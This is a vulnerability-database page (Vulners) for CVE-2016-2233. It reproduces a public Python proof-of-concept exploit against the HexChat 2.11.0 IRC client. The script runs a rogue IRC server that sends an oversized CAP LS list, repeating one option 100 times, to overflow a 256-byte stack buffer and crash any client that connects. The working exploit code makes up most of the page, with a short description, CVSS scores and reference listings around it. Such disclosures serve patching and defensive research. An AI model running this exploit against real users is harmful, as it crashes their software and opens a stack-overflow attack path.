Vulners
Lucene search
Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow | 4 Apr 201600:00 | – | zdt |
 | Hexchat IRC Client Stack Buffer Overflow Vulnerability | 6 Apr 201600:00 | – | cnvd |
 | CVE-2016-2233 | 18 Jan 201717:00 | – | cve |
 | CVE-2016-2233 | 18 Jan 201717:00 | – | cvelist |
 | CVE-2016-2233 | 18 Jan 201717:00 | – | debiancve |
 | Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow | 4 Apr 201600:00 | – | exploitpack |
 | CVE-2016-2233 | 18 Jan 201717:59 | – | nvd |
 | DEBIAN-CVE-2016-2233 | 18 Jan 201717:59 | – | osv |
| UBUNTU-CVE-2016-2233 | 18 Jan 201717:59 | – | osv |
 | Hexchat IRC Client 2.11.0 CAP LS Handling Buffer Overflow | 5 Apr 201600:00 | – | packetstorm |
10
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow
# Date: 2016-02-07
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits)
# CVE : CVE-2016-2233
#############################
# Vulnerability description #
#############################
'''
Stack Buffer Overflow in src/common/inbound.c :
void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data)
In this function, Hexchat IRC client receives the available extensions from
the IRC server (CAP LS message) and constructs the request string to indicate
later which one to use (CAP REQ message).
This request string is stored in the fixed size (256 bytes) byte array
'buffer'. It has enough space for all possible options combined, BUT
it will overflow if some options are repeated.
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : Hexchat will crash (most probably access violation/segmentation fault)
'''
import socket
import sys
import time
# Exploit configuration
HOST = ''
PORT = 6667
SERVERNAME = 'irc.example.com'
OPTIONS = 'multi-prefix ' * 100 # 13*100 = 1300 bytes > 256 bytes
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((HOST, PORT)) # Bind to port
sock.listen(0) # Start listening on socket
print 'Server listening, waiting for connection...'
conn, addr = sock.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
conn.send(':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n')
# Wait and close socket
conn.recv(256)
sock.close()
print 'Done.'
except socket.error as msg:
print 'Network error : ' + str(msg[0]) + ' ' + msg[1]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Apr 2016 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 25
CVSS 37.5
EPSS0.13341